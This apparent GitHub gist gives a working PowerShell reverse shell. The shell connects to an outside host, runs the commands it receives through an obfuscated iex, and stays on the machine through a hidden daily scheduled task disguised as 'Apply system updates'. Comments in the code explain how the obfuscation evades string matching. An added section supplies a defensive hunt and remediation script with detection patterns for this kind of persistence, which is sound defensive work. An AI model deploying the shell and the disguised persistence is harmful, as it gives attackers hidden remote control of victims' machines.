@jdgregson
Created March 25, 2022 08:21
Drops a reverse shell and launches it via a scheduled task one minute later and then every 24 hours. Shell portion modified from: https://github.com/tihanyin/PSSW100AVB/blob/main/ReverseShell_2022_03.ps1
# reverse shell hostname/ip
$h = "research.jdgregson.com"
# reverse shell port
$p = 80
# drop the shell: a single-quoted template with HOST/PORT substituted by -replace below.
# The read buffer is (2 -shl 15) = 65536 bytes. The initial prompt is sent from its own
# variable ($PP) so the buffer keeps its full size; the original reused $OO for the prompt,
# which shrank every later Read to the prompt's length and split commands across reads.
# $J.Close() at the end closes the client ($JJ was never defined). i`eX is iex with a
# backtick inserted to dodge naive string matching.
$shell = '$J=New-Object System.Net.Sockets.TCPClient("HOST",PORT);$SS=$J.GetStream();[byte[]]$OO=0..((2-shl(3*5))-1)|%{0};$PP=([text.encoding]::UTF8).GetBytes((Get-Location).Path+"> ");$SS.Write($PP,0,$PP.Length);while(($A=$SS.Read($OO,0,$OO.Length)) -ne 0){;$DD=(New-Object System.Text.UTF8Encoding).GetString($OO,0,$A);$GG=(i`eX $DD 2>&1|Out-String);$H=$GG+(pwd).Path+"> ";$L=([text.encoding]::UTF8).GetBytes($H);$SS.Write($L,0,$L.Length);$SS.Flush()};$J.Close()' -replace "HOST",$h -replace "PORT",$p
$script = "$env:temp\update.ps1"
$shell > $script
# schedule shell to run in one minute and then every 24 hours after that.
# The task runs as the registering user. -ExecutionPolicy Bypass is needed on hosts where
# the default Restricted policy would refuse to run a -File script. -At accepts a DateTime,
# so pass it directly instead of a formatted string (the original mixed a 24-hour "H" with
# an AM/PM "tt" designator).
$ta = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoLogo -WindowStyle Hidden -ExecutionPolicy Bypass -File $script"
$tt = New-ScheduledTaskTrigger -Daily -At (Get-Date).AddMinutes(1)
Register-ScheduledTask -TaskName "Update" -Action $ta -Trigger $tt -Description "Apply system updates"
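The persistence above leaves three artifacts on the host: a scheduled task whose action is powershell.exe with a hidden window and a -File pointing into %TEMP%, the dropped script itself containing a TCPClient loop, and a task-registration event in the audit logs. The following hunt script is an added example (it is not part of the gist) that looks for all three and offers a remediation step. It assumes an elevated Windows PowerShell 5.1 or later session on the host (unprivileged sessions only see tasks the current user can read), that Security event 4698 is enabled via "Audit Other Object Access Events", and that the Microsoft-Windows-TaskScheduler/Operational channel is enabled; where either is not, that query simply returns nothing. The pattern lists and the function names are this example's own choices.

```powershell
# Added hunt for dropped-PowerShell scheduled-task persistence. Not from the gist.
# Assumes an elevated Windows PowerShell 5.1+ session on the host being examined.

# Argument fragments typical of dropped-script persistence and rare in legitimate tasks.
$SuspiciousArgPatterns = @(
    '-w(indowstyle)?\s+hidden',
    '-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}',
    '-nop(rofile)?\b',
    '\\(Temp|AppData|ProgramData|Users\\Public)\\'
)
# Markers that identify a script body as a socket shell; i`e catches the backtick trick.
$ShellBodyPattern = 'TCPClient|GetStream\(\)|Invoke-Expression|\biex\b|i`e'

function Get-ExecTaskInfo {
    # One record per Exec action; COM-handler actions have no Execute and are skipped.
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            [pscustomobject]@{
                TaskPath   = $task.TaskPath
                TaskName   = $task.TaskName
                RunAs      = $task.Principal.UserId
                Registered = $task.Date
                Execute    = $action.Execute
                Arguments  = [string]$action.Arguments
            }
        }
    }
}

function Find-DroppedPowerShellTask {
    foreach ($t in Get-ExecTaskInfo) {
        if ($t.Execute -notmatch '(powershell|pwsh)(\.exe)?["'']?$') { continue }
        $hits = @($SuspiciousArgPatterns | Where-Object { $t.Arguments -match $_ })
        if (-not $hits) { continue }

        # Pull the -File target and inspect it; expand %VARS% in case the task was
        # registered with an unexpanded environment path.
        $scriptPath = $null; $marker = $null
        if ($t.Arguments -match '-File\s+"?([^"]+?\.ps1)"?') {
            $scriptPath = [Environment]::ExpandEnvironmentVariables($matches[1])
            if (Test-Path -LiteralPath $scriptPath) {
                $body = Get-Content -LiteralPath $scriptPath -Raw -ErrorAction SilentlyContinue
                if ($body -match $ShellBodyPattern) { $marker = $matches[0] }
            }
        }
        [pscustomobject]@{
            TaskPath    = $t.TaskPath
            TaskName    = $t.TaskName
            RunAs       = $t.RunAs
            Registered  = $t.Registered
            CommandLine = "$($t.Execute) $($t.Arguments)"
            ArgHits     = $hits -join ', '
            ScriptPath  = $scriptPath
            ShellMarker = $marker
        }
    }
}

function Get-RecentTaskRegistrations {
    # Audit-trail side: Security 4698 (task created) carries the full task XML in
    # TaskContent; TaskScheduler/Operational 106 (task registered) carries the name.
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    $queries = @(
        @{ LogName = 'Security'; Id = 4698; StartTime = $since },
        @{ LogName = 'Microsoft-Windows-TaskScheduler/Operational'; Id = 106; StartTime = $since }
    )
    foreach ($q in $queries) {
        foreach ($ev in Get-WinEvent -FilterHashtable $q -ErrorAction SilentlyContinue) {
            $data = @{}
            foreach ($d in ([xml]$ev.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time     = $ev.TimeCreated
                EventId  = $ev.Id
                Task     = $data['TaskName']
                Creator  = if ($data['SubjectUserName']) { $data['SubjectUserName'] } else { $data['UserContext'] }
                HiddenPS = [bool]($data['TaskContent'] -match '<Command>[^<]*powershell[^<]*</Command>\s*<Arguments>[^<]*hidden')
            }
        }
    }
}

function Remove-DroppedPowerShellTask {
    # Remediation for one finding: unregister the task and delete the dropped script.
    param([Parameter(Mandatory)]$Finding)
    Unregister-ScheduledTask -TaskPath $Finding.TaskPath -TaskName $Finding.TaskName -Confirm:$false
    if ($Finding.ScriptPath -and (Test-Path -LiteralPath $Finding.ScriptPath)) {
        Remove-Item -LiteralPath $Finding.ScriptPath -Force
    }
}

$findings = @(Find-DroppedPowerShellTask)
$findings | Format-List
Get-RecentTaskRegistrations -Hours 48 | Format-Table -AutoSize
# After review: $findings | ForEach-Object { Remove-DroppedPowerShellTask -Finding $_ }
```

Against the task registered above, the finding shows TaskName "Update" run as the registering user, ArgHits for the hidden window and the \AppData\ path, and ShellMarker "TCPClient" from the dropped update.ps1. On the network side, note that the shell connects to port 80 but speaks raw prompt text rather than HTTP, so an egress rule that forces web traffic through a proxy, or any inspection expecting an HTTP request line, will break or flag it.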